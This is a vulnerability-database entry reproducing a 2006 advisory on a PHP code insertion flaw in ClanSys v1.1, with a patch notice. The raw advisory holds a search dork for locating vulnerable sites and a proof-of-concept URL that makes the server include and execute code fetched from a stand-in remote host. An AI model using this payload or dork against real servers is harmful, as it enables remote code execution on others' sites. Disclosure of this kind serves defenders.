header-logo
Suggest Exploit
vendor:
ClanSys
by:
nukedx
7,5
CVSS
HIGH
PHP Code Insertion
94
CWE
Product Name: ClanSys
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:clansys:clansys:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ClanSys v1.1 (index.php page) PHP Code Insertion Vulnerability

ClanSys v1.1 is vulnerable to PHP Code Insertion. An attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious PHP code to the vulnerable application. The malicious code will be executed by the web server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of ClanSys.
Source

Exploit-DB raw data:

NukedX Security Advisory Nr 2006-29
ClanSys v1.1 (index.php page) PHP Code Insertion Vulnerability
Method found & Exploit scripted by nukedx
Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
Original advisory: http://www.nukedx.com/?viewdoc=29
Dork: "ClanSys v.1.1" 2.400 pages.
Full PoC ->
GET -> http://[victim]/[ClanSysPath]/index.php?page=[PHPCode]
EXAMPLE -> http://[victim]/[ClanSysPath]/index.php?page=<?include($s);?>&s=http://yourhost.com/cmd.txt?

# nukedx.com [2006-04-23]

# milw0rm.com [2006-04-23]

Navigation

Suggest Exploit

Services By CQR